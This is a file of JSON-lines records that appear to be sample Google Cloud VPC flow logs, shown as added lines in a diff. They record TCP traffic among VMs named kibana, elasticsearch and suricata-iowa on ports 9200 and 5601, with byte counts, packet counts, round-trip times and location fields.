+{"insertId":"y4wffpfk2ero9","jsonPayload":{"bytes_sent":"139106","connection":{"dest_ip":"10.87.40.76","dest_port":33560,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erog","jsonPayload":{"bytes_sent":"1733360","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60108},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"708","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2ero7","jsonPayload":{"bytes_sent":"149157","connection":{"dest_ip":"67.43.156.13","dest_port":33874,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"74","reporter":"SRC","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroe","jsonPayload":{"bytes_sent":"11108","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"95","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroa","jsonPayload":{"bytes_sent":"67337","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"351","reporter":"DEST","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroi","jsonPayload":{"bytes_sent":"136375","connection":{"dest_ip":"10.87.40.76","dest_port":33538,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2ero8","jsonPayload":{"bytes_sent":"181424","connection":{"dest_ip":"67.43.156.13","dest_port":33690,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393929808Z","packets_sent":"241","reporter":"SRC","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erol","jsonPayload":{"bytes_sent":"9303","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"94","reporter":"DEST","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2ero4","jsonPayload":{"bytes_sent":"142871","connection":{"dest_ip":"67.43.156.13","dest_port":33572,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821149051Z","packets_sent":"77","reporter":"SRC","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eror","jsonPayload":{"bytes_sent":"158811","connection":{"dest_ip":"67.43.156.13","dest_port":33968,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"69","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erob","jsonPayload":{"bytes_sent":"13455","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"81","reporter":"DEST","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erox","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":57300,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroc","jsonPayload":{"bytes_sent":"71014","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65315},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"728","reporter":"DEST","rtt_msec":"210","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erok","jsonPayload":{"bytes_sent":"60749","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eros","jsonPayload":{"bytes_sent":"160451","connection":{"dest_ip":"67.43.156.13","dest_port":33880,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821138391Z","packets_sent":"66","reporter":"SRC","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erod","jsonPayload":{"bytes_sent":"169173","connection":{"dest_ip":"10.87.40.76","dest_port":33574,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"64","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2ero6","jsonPayload":{"bytes_sent":"118762","connection":{"dest_ip":"67.43.156.13","dest_port":65315,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"615","reporter":"SRC","rtt_msec":"210","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eron","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"96","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroy","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":57300},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erof","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.13","dest_port":54662,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erov","jsonPayload":{"bytes_sent":"11674","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erop","jsonPayload":{"bytes_sent":"62831","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"346","reporter":"DEST","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erou","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"93","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":54662},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erow","jsonPayload":{"bytes_sent":"64588","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erot","jsonPayload":{"bytes_sent":"67315","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"354","reporter":"DEST","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroq","jsonPayload":{"bytes_sent":"175633","connection":{"dest_ip":"10.87.40.76","dest_port":33576,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"67","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 